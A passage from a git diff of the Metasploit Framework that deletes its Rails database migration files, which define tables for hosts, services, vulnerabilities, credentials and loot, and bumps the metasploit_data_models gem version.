.../20100920012100_add_generate_exe_column.rb | 8 - .../20100926214000_add_template_prefs.rb | 11 -- .../migrate/20101001000000_add_web_tables.rb | 57 ------- data/sql/migrate/20101002000000_add_query.rb | 10 -- .../migrate/20101007000000_add_vuln_info.rb | 15 -- ...20101008111800_add_clients_to_campaigns.rb | 10 -- ...20101009023300_add_campaign_attachments.rb | 15 -- .../20101104135100_add_imported_creds.rb | 17 -- .../migrate/20101203000000_fix_web_tables.rb | 34 ---- .../20101203000001_expand_host_comment.rb | 12 -- ...2033_add_limit_to_network_to_workspaces.rb | 9 - ...20110112154300_add_module_uuid_to_tasks.rb | 9 - .../migrate/20110204112800_add_host_tags.rb | 28 ---- .../20110317144932_add_session_table.rb | 110 ------------- ...414180600_add_local_id_to_session_table.rb | 11 -- .../20110415175705_add_routes_table.rb | 18 -- .../migrate/20110422000000_convert_binary.rb | 72 -------- ...0110425095900_add_last_seen_to_sessions.rb | 8 - ...0110513143900_track_successful_exploits.rb | 31 ---- ...517160800_rename_and_prune_nessus_vulns.rb | 26 --- ...0527000000_add_task_id_to_reports_table.rb | 11 -- .../20110527000001_add_api_keys_table.rb | 12 -- .../20110606000001_add_macros_table.rb | 16 -- ...00_move_old_imported_creds_to_new_files.rb | 127 --------------- ...10622000000_add_settings_to_tasks_table.rb | 12 -- .../20110624000001_add_listeners_table.rb | 19 --- ...0625000001_add_macro_to_listeners_table.rb | 12 -- ...110630000001_add_nexpose_consoles_table.rb | 21 --- ...0002_add_name_to_nexpose_consoles_table.rb | 12 -- .../20110717000001_add_profiles_table.rb | 15 -- ...20110727163801_expand_cred_ptype_column.rb | 9 - .../20110730000001_add_initial_indexes.rb | 85 ---------- .../migrate/20110812000001_prune_indexes.rb | 23 --- .../migrate/20110922000000_expand_notes.rb | 9 - .../20110928101300_add_mod_ref_table.rb | 17 -- ...10000_add_display_name_to_reports_table.rb | 24 --- .../migrate/20111203000000_inet_columns.rb | 13 -- .../20111204000000_more_inet_columns.rb | 17 -- .../20111210000000_add_scope_to_hosts.rb | 9 - ...0120126110000_add_virtual_host_to_hosts.rb | 9 - ...20120411173220_rename_workspace_members.rb | 9 - ...20601152442_add_counter_caches_to_hosts.rb | 21 --- .../20120625000000_add_vuln_details.rb | 34 ---- .../20120625000001_add_host_details.rb | 16 -- .../migrate/20120625000002_expand_details.rb | 16 -- .../migrate/20120625000003_expand_details2.rb | 24 --- .../20120625000004_add_vuln_attempts.rb | 19 --- ...000005_add_vuln_and_host_counter_caches.rb | 14 -- .../20120625000006_add_module_details.rb | 118 -------------- .../20120625000007_add_exploit_attempts.rb | 26 --- .../20120625000008_add_fail_message.rb | 12 -- ...2805_add_owner_and_payload_to_web_vulns.rb | 13 -- lib/msf/core/db_manager.rb | 6 +- 88 files changed, 13 insertions(+), 2219 deletions(-) delete mode 100755 data/sql/migrate/000_create_tables.rb delete mode 100755 data/sql/migrate/001_add_wmap_tables.rb delete mode 100755 data/sql/migrate/002_add_workspaces.rb delete mode 100755 data/sql/migrate/003_move_notes.rb delete mode 100755 data/sql/migrate/004_add_events_table.rb delete mode 100755 data/sql/migrate/005_expand_info.rb delete mode 100755 data/sql/migrate/006_add_timestamps.rb delete mode 100755 data/sql/migrate/007_add_loots.rb delete mode 100755 data/sql/migrate/008_create_users.rb delete mode 100755 data/sql/migrate/009_add_loots_ctype.rb delete mode 100755 data/sql/migrate/010_add_alert_fields.rb delete mode 100755 data/sql/migrate/011_add_reports.rb delete mode 100755 data/sql/migrate/012_add_tasks.rb delete mode 100755 data/sql/migrate/013_add_tasks_result.rb delete mode 100755 data/sql/migrate/014_add_loots_fields.rb delete mode 100755 data/sql/migrate/015_rename_user.rb delete mode 100755 data/sql/migrate/016_add_host_purpose.rb delete mode 100755 data/sql/migrate/017_expand_info2.rb delete mode 100755 data/sql/migrate/018_add_workspace_user_info.rb delete mode 100755 data/sql/migrate/019_add_workspace_desc.rb delete mode 100755 data/sql/migrate/020_add_user_preferences.rb delete mode 100755 data/sql/migrate/021_standardize_info_and_data.rb delete mode 100755 data/sql/migrate/022_enlarge_event_info.rb delete mode 100755 data/sql/migrate/023_add_report_downloaded_at.rb delete mode 100755 data/sql/migrate/024_convert_service_info_to_text.rb delete mode 100755 data/sql/migrate/025_add_user_admin.rb delete mode 100755 data/sql/migrate/026_add_creds_table.rb delete mode 100755 data/sql/migrate/20100819123300_migrate_cred_data.rb delete mode 100755 data/sql/migrate/20100824151500_add_exploited_table.rb delete mode 100755 data/sql/migrate/20100908001428_add_owner_to_workspaces.rb delete mode 100755 data/sql/migrate/20100911122000_add_report_templates.rb delete mode 100755 data/sql/migrate/20100916151530_require_admin_flag.rb delete mode 100755 data/sql/migrate/20100916175000_add_campaigns_and_templates.rb delete mode 100755 data/sql/migrate/20100920012100_add_generate_exe_column.rb delete mode 100755 data/sql/migrate/20100926214000_add_template_prefs.rb delete mode 100755 data/sql/migrate/20101001000000_add_web_tables.rb delete mode 100755 data/sql/migrate/20101002000000_add_query.rb delete mode 100755 data/sql/migrate/20101007000000_add_vuln_info.rb delete mode 100755 data/sql/migrate/20101008111800_add_clients_to_campaigns.rb delete mode 100755 data/sql/migrate/20101009023300_add_campaign_attachments.rb delete mode 100755 data/sql/migrate/20101104135100_add_imported_creds.rb delete mode 100755 data/sql/migrate/20101203000000_fix_web_tables.rb delete mode 100755 data/sql/migrate/20101203000001_expand_host_comment.rb delete mode 100755 data/sql/migrate/20101206212033_add_limit_to_network_to_workspaces.rb delete mode 100755 data/sql/migrate/20110112154300_add_module_uuid_to_tasks.rb delete mode 100755 data/sql/migrate/20110204112800_add_host_tags.rb delete mode 100755 data/sql/migrate/20110317144932_add_session_table.rb delete mode 100755 data/sql/migrate/20110414180600_add_local_id_to_session_table.rb delete mode 100755 data/sql/migrate/20110415175705_add_routes_table.rb delete mode 100755 data/sql/migrate/20110422000000_convert_binary.rb delete mode 100755 data/sql/migrate/20110425095900_add_last_seen_to_sessions.rb delete mode 100755 data/sql/migrate/20110513143900_track_successful_exploits.rb delete mode 100755 data/sql/migrate/20110517160800_rename_and_prune_nessus_vulns.rb delete mode 100755 data/sql/migrate/20110527000000_add_task_id_to_reports_table.rb delete mode 100755 data/sql/migrate/20110527000001_add_api_keys_table.rb delete mode 100755 data/sql/migrate/20110606000001_add_macros_table.rb delete mode 100755 data/sql/migrate/20110610085000_move_old_imported_creds_to_new_files.rb delete mode 100755 data/sql/migrate/20110622000000_add_settings_to_tasks_table.rb delete mode 100755 data/sql/migrate/20110624000001_add_listeners_table.rb delete mode 100755 data/sql/migrate/20110625000001_add_macro_to_listeners_table.rb delete mode 100755 data/sql/migrate/20110630000001_add_nexpose_consoles_table.rb delete mode 100755 data/sql/migrate/20110630000002_add_name_to_nexpose_consoles_table.rb delete mode 100755 data/sql/migrate/20110717000001_add_profiles_table.rb delete mode 100755 data/sql/migrate/20110727163801_expand_cred_ptype_column.rb delete mode 100755 data/sql/migrate/20110730000001_add_initial_indexes.rb delete mode 100755 data/sql/migrate/20110812000001_prune_indexes.rb delete mode 100755 data/sql/migrate/20110922000000_expand_notes.rb delete mode 100755 data/sql/migrate/20110928101300_add_mod_ref_table.rb delete mode 100755 data/sql/migrate/20111011110000_add_display_name_to_reports_table.rb delete mode 100755 data/sql/migrate/20111203000000_inet_columns.rb delete mode 100755 data/sql/migrate/20111204000000_more_inet_columns.rb delete mode 100755 data/sql/migrate/20111210000000_add_scope_to_hosts.rb delete mode 100755 data/sql/migrate/20120126110000_add_virtual_host_to_hosts.rb delete mode 100755 data/sql/migrate/20120411173220_rename_workspace_members.rb delete mode 100755 data/sql/migrate/20120601152442_add_counter_caches_to_hosts.rb delete mode 100755 data/sql/migrate/20120625000000_add_vuln_details.rb delete mode 100755 data/sql/migrate/20120625000001_add_host_details.rb delete mode 100755 data/sql/migrate/20120625000002_expand_details.rb delete mode 100755 data/sql/migrate/20120625000003_expand_details2.rb delete mode 100755 data/sql/migrate/20120625000004_add_vuln_attempts.rb delete mode 100755 data/sql/migrate/20120625000005_add_vuln_and_host_counter_caches.rb delete mode 100755 data/sql/migrate/20120625000006_add_module_details.rb delete mode 100755 data/sql/migrate/20120625000007_add_exploit_attempts.rb delete mode 100755 data/sql/migrate/20120625000008_add_fail_message.rb delete mode 100644 data/sql/migrate/20120718202805_add_owner_and_payload_to_web_vulns.rb diff --git a/Gemfile b/Gemfile index 3d5f14fe4c..9513b0a497 100755 --- a/Gemfile +++ b/Gemfile @@ -7,7 +7,7 @@ gem 'activerecord' # Needed for some admin modules (scrutinizer_add_user.rb) gem 'json' # Database models shared between framework and Pro. -gem 'metasploit_data_models', :git => 'git://github.com/rapid7/metasploit_data_models.git', :tag => '0.4.0' +gem 'metasploit_data_models', :git => 'git://github.com/rapid7/metasploit_data_models.git', :tag => '0.5.1' # Needed by msfgui and other rpc components gem 'msgpack' # Needed by anemone crawler diff --git a/Gemfile.lock b/Gemfile.lock index c50df873bf..6ac57f60f6 100644 --- a/Gemfile.lock +++ b/Gemfile.lock @@ -1,9 +1,9 @@ GIT remote: git://github.com/rapid7/metasploit_data_models.git - revision: 448c1065329efea1eac76a3897f626f122666743 - tag: 0.4.0 + revision: a56276f8f6d1f2d532c03d2900537cadf94e1411 + tag: 0.5.1 specs: - metasploit_data_models (0.4.0) + metasploit_data_models (0.5.1) activerecord (>= 3.2.10) activesupport pg @@ -25,7 +25,7 @@ GEM multi_json (~> 1.0) arel (3.0.2) builder (3.0.4) - coderay (1.0.8) + coderay (1.0.9) diff-lcs (1.1.3) i18n (0.6.1) json (1.7.7) @@ -35,10 +35,10 @@ GEM nokogiri (1.5.6) pcaprub (0.11.3) pg (0.14.1) - pry (0.9.10) + pry (0.9.12) coderay (~> 1.0.5) method_source (~> 0.8) - slop (~> 3.3.1) + slop (~> 3.4) rake (10.0.2) redcarpet (2.2.2) robots (0.10.1) @@ -54,7 +54,7 @@ GEM multi_json (~> 1.0.3) simplecov-html (~> 0.5.3) simplecov-html (0.5.3) - slop (3.3.3) + slop (3.4.3) tzinfo (0.3.35) yard (0.8.3) diff --git a/data/sql/migrate/000_create_tables.rb b/data/sql/migrate/000_create_tables.rb deleted file mode 100755 index efda742476..0000000000 --- a/data/sql/migrate/000_create_tables.rb +++ /dev/null @@ -1,79 +0,0 @@ -class CreateTables < ActiveRecord::Migration - - def self.up - - create_table :hosts do |t| - t.timestamp :created - t.string :address, :limit => 16 # unique - t.string :address6 - t.string :mac - t.string :comm - t.string :name - t.string :state - t.string :info, :limit => 1024 - t.string :os_name - t.string :os_flavor - t.string :os_sp - t.string :os_lang - t.string :arch - end - - add_index :hosts, :address, :unique => true - - create_table :clients do |t| - t.integer :host_id - t.timestamp :created - t.string :ua_string, :limit => 1024, :null => false - t.string :ua_name, :limit => 64 - t.string :ua_ver, :limit => 32 - end - - create_table :services do |t| - t.integer :host_id - t.timestamp :created - t.integer :port, :null => false - t.string :proto, :limit => 16, :null => false - t.string :state - t.string :name - t.string :info, :limit => 1024 - end - - create_table :vulns do |t| - t.integer :host_id - t.integer :service_id - t.timestamp :created - t.string :name - t.text :data - end - - create_table :refs do |t| - t.integer :ref_id - t.timestamp :created - t.string :name, :limit => 512 - end - - create_table :vulns_refs, :id => false do |t| - t.integer :ref_id - t.integer :vuln_id - end - - create_table :notes do |t| - t.integer :host_id - t.timestamp :created - t.string :ntype, :limit => 512 - t.text :data - end - - end - - def self.down - drop_table :hosts - drop_table :clients - drop_table :services - drop_table :vulns - drop_table :refs - drop_table :vulns_refs - drop_table :notes - end - -end diff --git a/data/sql/migrate/001_add_wmap_tables.rb b/data/sql/migrate/001_add_wmap_tables.rb deleted file mode 100755 index e0d37098c2..0000000000 --- a/data/sql/migrate/001_add_wmap_tables.rb +++ /dev/null @@ -1,35 +0,0 @@ -class AddWmapTables < ActiveRecord::Migration - def self.up - create_table :wmap_targets do |t| - t.string :host # vhost - t.string :address, :limit => 16 # unique - t.string :address6 - t.integer :port - t.integer :ssl - t.integer :selected - end - - create_table :wmap_requests do |t| - t.string :host # vhost - t.string :address, :limit => 16 # unique - t.string :address6 - t.integer :port - t.integer :ssl - t.string :meth, :limit => 32 - t.text :path - t.text :headers - t.text :query - t.text :body - t.string :respcode, :limit => 16 - t.text :resphead - t.text :response - t.timestamp :created - end - end - - def self.down - drop_table :wmap_targets - drop_table :wmap_requests - end -end - diff --git a/data/sql/migrate/002_add_workspaces.rb b/data/sql/migrate/002_add_workspaces.rb deleted file mode 100755 index 9afe792ef5..0000000000 --- a/data/sql/migrate/002_add_workspaces.rb +++ /dev/null @@ -1,36 +0,0 @@ -class AddWorkspaces < ActiveRecord::Migration - - def self.up - create_table :workspaces do |t| - t.string :name - t.timestamps - end - - change_table :hosts do |t| - t.integer :workspace_id, :required => true - end - - remove_index :hosts, :column => :address - - # - # This was broken after 018_add_workspace_user_info was introduced - # because of the new boundary column. For some reason, the - # find_or_create_by_name that .default eventually calls here tries to - # create a record with the boundary field that doesn't exist yet. - # See #1724 - # - #w = Msf::DBManager::Workspace.default - #Msf::DBManager::Host.update_all ["workspace_id = ?", w.id] - end - - def self.down - drop_table :workspaces - - change_table :hosts do |t| - t.remove :workspace_id - end - - add_index :hosts, :address, :unique => true - end - -end diff --git a/data/sql/migrate/003_move_notes.rb b/data/sql/migrate/003_move_notes.rb deleted file mode 100755 index 3aedba8e20..0000000000 --- a/data/sql/migrate/003_move_notes.rb +++ /dev/null @@ -1,20 +0,0 @@ -class MoveNotes < ActiveRecord::Migration - def self.up - # Remove the host requirement. We'll add the column back in below. - remove_column :notes, :host_id - change_table :notes do |t| - t.integer :workspace_id, :null => false, :default => 1 - t.integer :service_id - t.integer :host_id - end - end - - def self.down - remove_column :notes, :workspace_id - remove_column :notes, :service_id - change_table :notes do |t| - t.integer :host_id, :null => false - end - end -end - diff --git a/data/sql/migrate/004_add_events_table.rb b/data/sql/migrate/004_add_events_table.rb deleted file mode 100755 index a89d75281e..0000000000 --- a/data/sql/migrate/004_add_events_table.rb +++ /dev/null @@ -1,16 +0,0 @@ -class AddEventsTable < ActiveRecord::Migration - def self.up - create_table :events do |t| - t.integer :workspace_id - t.integer :host_id - t.timestamp :created_at - t.string :user - t.string :name - t.string :info - end - end - def self.down - drop_table :events - end -end - diff --git a/data/sql/migrate/005_expand_info.rb b/data/sql/migrate/005_expand_info.rb deleted file mode 100755 index bd34021e11..0000000000 --- a/data/sql/migrate/005_expand_info.rb +++ /dev/null @@ -1,58 +0,0 @@ -class ExpandInfo < ActiveRecord::Migration - def self.up - remove_column :events, :info - change_table :events do |t| - t.string :info, :limit => 4096 - end - - remove_column :notes, :data - change_table :notes do |t| - t.string :data, :limit => 4096 - end - - remove_column :vulns, :data - change_table :vulns do |t| - t.string :data, :limit => 4096 - end - - remove_column :hosts, :info - change_table :hosts do |t| - t.string :info, :limit => 4096 - end - - remove_column :services, :info - change_table :services do |t| - t.string :info, :limit => 4096 - end - end - - def self.down - - remove_column :events, :info - change_table :events do |t| - t.string :info - end - - remove_column :notes, :data - change_table :notes do |t| - t.string :data, :limit => 1024 - end - - remove_column :hosts, :info - change_table :hosts do |t| - t.string :info, :limit => 1024 - end - - remove_column :vulns, :data - change_table :hosts do |t| - t.string :data, :limit => 1024 - end - - remove_column :services, :info - change_table :services do |t| - t.string :info, :limit => 1024 - end - - end -end - diff --git a/data/sql/migrate/006_add_timestamps.rb b/data/sql/migrate/006_add_timestamps.rb deleted file mode 100755 index 446a83aa29..0000000000 --- a/data/sql/migrate/006_add_timestamps.rb +++ /dev/null @@ -1,26 +0,0 @@ - -# Adds 'created_at' and 'updated_at' columns to every primary table. -# -class AddTimestamps < ActiveRecord::Migration - - @@TABLES_NEEDING_RENAME = [:clients, :hosts, :notes, :refs, :services, :vulns, :wmap_requests] - @@TABLES_NEEDING_CREATED_AT = [:wmap_targets] - @@TABLES_NEEDING_UPDATED_AT = [:clients, :events, :hosts, :notes, :refs, :services, :vulns, :wmap_requests, :wmap_targets] - - def self.up - @@TABLES_NEEDING_RENAME.each { |t| rename_column t, :created, :created_at } - - @@TABLES_NEEDING_CREATED_AT.each { |t| add_column t, :created_at, :datetime } - - @@TABLES_NEEDING_UPDATED_AT.each { |t| add_column t, :updated_at, :datetime } - end - - def self.down - @@TABLES_NEEDING_RENAME.each { |t| rename_column t, :created_at, :created } - - @@TABLES_NEEDING_CREATED_AT.each { |t| remove_column t, :created_at } - - @@TABLES_NEEDING_UPDATED_AT.each { |t| remove_column t, :updated_at } - end -end - diff --git a/data/sql/migrate/007_add_loots.rb b/data/sql/migrate/007_add_loots.rb deleted file mode 100755 index 32786f8cfb..0000000000 --- a/data/sql/migrate/007_add_loots.rb +++ /dev/null @@ -1,20 +0,0 @@ -class AddLoots < ActiveRecord::Migration - - def self.up - create_table :loots do |t| - t.integer :workspace_id, :null => false, :default => 1 - t.integer :host_id - t.integer :service_id - t.string :ltype, :limit => 512 - t.string :path, :limit => 1024 - t.text :data - t.timestamps - end - end - - def self.down - drop_table :loots - end - -end - diff --git a/data/sql/migrate/008_create_users.rb b/data/sql/migrate/008_create_users.rb deleted file mode 100755 index 4cc32cc6e4..0000000000 --- a/data/sql/migrate/008_create_users.rb +++ /dev/null @@ -1,16 +0,0 @@ -class CreateUsers < ActiveRecord::Migration - def self.up - create_table :users do |t| - t.string :username - t.string :crypted_password - t.string :password_salt - t.string :persistence_token - - t.timestamps - end - end - - def self.down - drop_table :users - end -end diff --git a/data/sql/migrate/009_add_loots_ctype.rb b/data/sql/migrate/009_add_loots_ctype.rb deleted file mode 100755 index 0aad1366fb..0000000000 --- a/data/sql/migrate/009_add_loots_ctype.rb +++ /dev/null @@ -1,10 +0,0 @@ -class AddLootsCtype < ActiveRecord::Migration - def self.up - add_column :loots, :content_type, :string - end - - def self.down - remove_column :loots, :content_type - end -end - diff --git a/data/sql/migrate/010_add_alert_fields.rb b/data/sql/migrate/010_add_alert_fields.rb deleted file mode 100755 index f99dd68d32..0000000000 --- a/data/sql/migrate/010_add_alert_fields.rb +++ /dev/null @@ -1,16 +0,0 @@ -class AddAlertFields < ActiveRecord::Migration - def self.up - add_column :notes, :critical, :boolean - add_column :notes, :seen, :boolean - add_column :events, :critical, :boolean - add_column :events, :seen, :boolean - end - - def self.down - remove_column :notes, :critical - remove_column :notes, :seen - remove_column :events, :critical - remove_column :events, :seen - end -end - diff --git a/data/sql/migrate/011_add_reports.rb b/data/sql/migrate/011_add_reports.rb deleted file mode 100755 index 2f16e8b70d..0000000000 --- a/data/sql/migrate/011_add_reports.rb +++ /dev/null @@ -1,19 +0,0 @@ -class AddReports < ActiveRecord::Migration - - def self.up - create_table :reports do |t| - t.integer :workspace_id, :null => false, :default => 1 - t.string :created_by - t.string :rtype - t.string :path, :limit => 1024 - t.text :options - t.timestamps - end - end - - def self.down - drop_table :reports - end - -end - diff --git a/data/sql/migrate/012_add_tasks.rb b/data/sql/migrate/012_add_tasks.rb deleted file mode 100755 index 39004c821e..0000000000 --- a/data/sql/migrate/012_add_tasks.rb +++ /dev/null @@ -1,24 +0,0 @@ -class AddTasks < ActiveRecord::Migration - - def self.up - create_table :tasks do |t| - t.integer :workspace_id, :null => false, :default => 1 - t.string :created_by - t.string :module - t.datetime :completed_at - t.string :path, :limit => 1024 - t.string :info - t.string :description - t.integer :progress - t.text :options - t.text :error - t.timestamps - end - end - - def self.down - drop_table :tasks - end - -end - diff --git a/data/sql/migrate/013_add_tasks_result.rb b/data/sql/migrate/013_add_tasks_result.rb deleted file mode 100755 index bf01c7afb8..0000000000 --- a/data/sql/migrate/013_add_tasks_result.rb +++ /dev/null @@ -1,10 +0,0 @@ -class AddTasksResult < ActiveRecord::Migration - def self.up - add_column :tasks, :result, :text - end - - def self.down - remove_column :tasks, :result - end -end - diff --git a/data/sql/migrate/014_add_loots_fields.rb b/data/sql/migrate/014_add_loots_fields.rb deleted file mode 100755 index 616d8c96be..0000000000 --- a/data/sql/migrate/014_add_loots_fields.rb +++ /dev/null @@ -1,12 +0,0 @@ -class AddLootsFields < ActiveRecord::Migration - def self.up - add_column :loots, :name, :text - add_column :loots, :info, :text - end - - def self.down - remove_column :loots, :name - remove_column :loots, :info - end -end - diff --git a/data/sql/migrate/015_rename_user.rb b/data/sql/migrate/015_rename_user.rb deleted file mode 100755 index 7934a0f423..0000000000 --- a/data/sql/migrate/015_rename_user.rb +++ /dev/null @@ -1,16 +0,0 @@ -class RenameUser < ActiveRecord::Migration - def self.up - remove_column :events, :user - change_table :events do |t| - t.string :username - end - end - - def self.down - remove_column :events, :username - change_table :events do |t| - t.string :user - end - end -end - diff --git a/data/sql/migrate/016_add_host_purpose.rb b/data/sql/migrate/016_add_host_purpose.rb deleted file mode 100755 index 1e2827801e..0000000000 --- a/data/sql/migrate/016_add_host_purpose.rb +++ /dev/null @@ -1,10 +0,0 @@ -class AddHostPurpose < ActiveRecord::Migration - def self.up - add_column :hosts, :purpose, :text - end - - def self.down - remove_column :hosts, :purpose - end -end - diff --git a/data/sql/migrate/017_expand_info2.rb b/data/sql/migrate/017_expand_info2.rb deleted file mode 100755 index cee6fd8d3b..0000000000 --- a/data/sql/migrate/017_expand_info2.rb +++ /dev/null @@ -1,58 +0,0 @@ -class ExpandInfo2 < ActiveRecord::Migration - def self.up - remove_column :events, :info - change_table :events do |t| - t.string :info, :limit => 65536 - end - - remove_column :notes, :data - change_table :notes do |t| - t.string :data, :limit => 65536 - end - - remove_column :vulns, :data - change_table :vulns do |t| - t.string :data, :limit => 65536 - end - - remove_column :hosts, :info - change_table :hosts do |t| - t.string :info, :limit => 65536 - end - - remove_column :services, :info - change_table :services do |t| - t.string :info, :limit => 65536 - end - end - - def self.down - - remove_column :events, :info - change_table :events do |t| - t.string :info - end - - remove_column :notes, :data - change_table :notes do |t| - t.string :data, :limit => 4096 - end - - remove_column :hosts, :info - change_table :hosts do |t| - t.string :info, :limit => 4096 - end - - remove_column :vulns, :data - change_table :vulns do |t| - t.string :data, :limit => 4096 - end - - remove_column :services, :info - change_table :services do |t| - t.string :info, :limit => 4096 - end - - end -end - diff --git a/data/sql/migrate/018_add_workspace_user_info.rb b/data/sql/migrate/018_add_workspace_user_info.rb deleted file mode 100755 index fb5e101fc3..0000000000 --- a/data/sql/migrate/018_add_workspace_user_info.rb +++ /dev/null @@ -1,29 +0,0 @@ -class AddWorkspaceUserInfo < ActiveRecord::Migration - def self.up - change_table :workspaces do |t| - t.string :boundary, :limit => 4096 - end - - change_table :users do |t| - t.string :fullname - t.string :email - t.string :phone - t.string :company - end - end - - def self.down - change_table :workspaces do |t| - t.remove :boundary - end - - change_table :users do |t| - t.remove :fullname - t.remove :email - t.remove :phone - t.remove :company - end - end - -end - diff --git a/data/sql/migrate/019_add_workspace_desc.rb b/data/sql/migrate/019_add_workspace_desc.rb deleted file mode 100755 index 0dc31f0c61..0000000000 --- a/data/sql/migrate/019_add_workspace_desc.rb +++ /dev/null @@ -1,23 +0,0 @@ -class AddWorkspaceDesc < ActiveRecord::Migration - def self.up - change_table :workspaces do |t| - t.string :description, :limit => 4096 - end - - change_table :hosts do |t| - t.string :comments, :limit => 4096 - end - end - - def self.down - change_table :workspaces do |t| - t.remove :description - end - - change_table :hosts do |t| - t.remove :comments - end - end - -end - diff --git a/data/sql/migrate/020_add_user_preferences.rb b/data/sql/migrate/020_add_user_preferences.rb deleted file mode 100755 index 40b472701c..0000000000 --- a/data/sql/migrate/020_add_user_preferences.rb +++ /dev/null @@ -1,11 +0,0 @@ -class AddUserPreferences < ActiveRecord::Migration - def self.up - add_column :users, :prefs, :string, :limit => 524288 - end - - def self.down - remove_column :users, :prefs - end - -end - diff --git a/data/sql/migrate/021_standardize_info_and_data.rb b/data/sql/migrate/021_standardize_info_and_data.rb deleted file mode 100755 index bb9a2bccd6..0000000000 --- a/data/sql/migrate/021_standardize_info_and_data.rb +++ /dev/null @@ -1,18 +0,0 @@ -class StandardizeInfoAndData < ActiveRecord::Migration - def self.up - # Remove the host requirement. We'll add the column back in below. - remove_column :vulns, :data - change_table :vulns do |t| - t.string :info, :limit => 65536 - end - end - - def self.down - remove_column :vulns, :info - change_table :notes do |t| - t.string :data, :limit => 65536 - - end - end -end - diff --git a/data/sql/migrate/022_enlarge_event_info.rb b/data/sql/migrate/022_enlarge_event_info.rb deleted file mode 100755 index fec9698c06..0000000000 --- a/data/sql/migrate/022_enlarge_event_info.rb +++ /dev/null @@ -1,10 +0,0 @@ -class EnlargeEventInfo < ActiveRecord::Migration - def self.up - change_column :events, :info, :text - end - - def self.down - change_column :events, :info, :string, :limit => 65535 - end -end - diff --git a/data/sql/migrate/023_add_report_downloaded_at.rb b/data/sql/migrate/023_add_report_downloaded_at.rb deleted file mode 100755 index 7ec5716e82..0000000000 --- a/data/sql/migrate/023_add_report_downloaded_at.rb +++ /dev/null @@ -1,10 +0,0 @@ -class AddReportDownloadedAt < ActiveRecord::Migration - def self.up - add_column :reports, :downloaded_at, :timestamp - end - - def self.down - remove_column :reports, :downloaded_at - end -end - diff --git a/data/sql/migrate/024_convert_service_info_to_text.rb b/data/sql/migrate/024_convert_service_info_to_text.rb deleted file mode 100755 index 14f0a96222..0000000000 --- a/data/sql/migrate/024_convert_service_info_to_text.rb +++ /dev/null @@ -1,12 +0,0 @@ -class ConvertServiceInfoToText < ActiveRecord::Migration - - def self.up - change_column :services, :info, :text - end - - def self.down - change_column :services, :info, :string, :limit => 65536 - end - -end - diff --git a/data/sql/migrate/025_add_user_admin.rb b/data/sql/migrate/025_add_user_admin.rb deleted file mode 100755 index d077dbd633..0000000000 --- a/data/sql/migrate/025_add_user_admin.rb +++ /dev/null @@ -1,19 +0,0 @@ -class AddUserAdmin < ActiveRecord::Migration - - # Add user admin flag and project member list. - def self.up - add_column :users, :admin, :boolean, :default => true - - create_table :project_members, :id => false do |t| - t.integer :workspace_id, :null => false - t.integer :user_id, :null => false - end - end - - def self.down - remove_column :users, :admin - - drop_table :project_members - end -end - diff --git a/data/sql/migrate/026_add_creds_table.rb b/data/sql/migrate/026_add_creds_table.rb deleted file mode 100755 index 381ec8373a..0000000000 --- a/data/sql/migrate/026_add_creds_table.rb +++ /dev/null @@ -1,19 +0,0 @@ -class AddCredsTable < ActiveRecord::Migration - def self.up - create_table :creds do |t| - t.integer :service_id, :null => false - t.timestamps - t.string :user, :limit => 2048 - t.string :pass, :limit => 4096 - t.boolean :active, :default => true - t.string :proof, :limit => 4096 - t.string :ptype, :limit => 16 - t.integer :source_id - t.string :source_type - end - end - def self.down - drop_table :creds - end -end - diff --git a/data/sql/migrate/20100819123300_migrate_cred_data.rb b/data/sql/migrate/20100819123300_migrate_cred_data.rb deleted file mode 100755 index d752c270f4..0000000000 --- a/data/sql/migrate/20100819123300_migrate_cred_data.rb +++ /dev/null @@ -1,154 +0,0 @@ -class MigrateCredData < ActiveRecord::Migration - - def self.up - begin # Wrap the whole thing in a giant rescue. - skipped_notes = [] - new_creds = [] - Mdm::Note.find(:all).each do |note| - next unless note.ntype[/^auth\.(.*)/] - service_name = $1 - if !service_name - skipped_notes << note - next - end - if note.host and note.host.respond_to?(:address) - if note.service - svc_id = note.service.id - else - candidate_services = [] - note.host.services.each do |service| - if service.name == service_name - candidate_services << service - end - end - # Use the default port, or the first port that matches the protocol name. - default_port = case service_name.downcase - when 'ftp'; 21 - when /^smb/; 445 - when /^imap/; 143 - when 'telnet'; 23 - when 'pop3'; 110 - when 'http','domino','axis','wordpress','tomcat'; 80 - when 'tns'; 1521 - when 'snmp'; 161 - when 'mssql'; 1433 - when 'ssh'; 22 - when 'https'; 443 - when 'mysql'; 3306 - when 'db2'; 50000 - when 'postgres'; 5432 - else nil - end - if !default_port - skipped_notes << note - next - end - if candidate_services.size == 1 - svc_id = candidate_services.first.id - elsif candidate_services.empty? - Mdm::Service.new do |svc| - svc.host_id = note.host.id - svc.port = default_port - svc.proto = 'tcp' - svc.state = 'open' - svc.name = service_name.downcase - svc.save! - svc_id = svc.id - end - elsif candidate_services.size > 1 - svc_ports = candidate_services.map{|s| s.port} - if svc_ports.index(default_port) - svc_id = candidate_services[svc_ports.index(default_port)].id - else - svc_id = candidate_services.first.id - end - end - end - else - skipped_notes << note - next - end - if note.data[:hash] - ptype = 'smb_hash' - pass = note.data[:hash] - elsif note.data[:ssh_key] - ptype = 'ssh_key' - pass = note.data[:extra] - else - ptype = 'password' - pass = note.data[:pass] - end - # Format domains and databases into the usernames. - if note.ntype == "auth.smb_challenge" - domain = note.data[:extra].match(/DOMAIN=([^\s]+)/)[1] - if domain - user = [domain, note.data[:user]].join("/") - else - user = note.data[:user] - end - elsif note.ntype =~ /auth\.(postgres|db2)/ - if note.data[:database] - user = [note.data[:database], note.data[:user]].join("/") - else - user = note.data[:user] - end - else - user = note.data[:user] - end - # Not actually a credentials, convert to migrated notes - if service_name == 'smb' && note.data[:token] - skipped_notes << note - next - end - if service_name == 'tns' && note.data[:type] == "bruteforced_sid" - skipped_notes << note - next - end - # Special case for the bizarre reporting for aux/admin/oracle/oracle_login - if service_name == 'tns' && note.data[:type] == "bruteforced_account" - note.data[:data] =~ /([^\x2f]+)\x2f([^\s]+).*with sid (.*)/ - user = "#{$3}/#{$1}" - pass = $2 - end - new_creds << [svc_id, ptype, user, pass] - end - - say "Migrating #{new_creds.size} credentials." - new_creds.uniq.each do |note| - Mdm::Cred.new do |cred| - cred.service_id = note[0] - cred.user = note[2] - cred.pass = note[3] - cred.ptype = note[1] - cred.save! - end - end - - say "Migrating #{skipped_notes.size} notes." - skipped_notes.uniq.each do |note| - Mdm::Note.new do |new_note| - new_note.host_id = note.host_id - new_note.ntype = "migrated_auth" - new_note.data = note.data.merge(:migrated_auth_type => note.ntype) - new_note.save! - end - end - - say "Deleting migrated auth notes." - 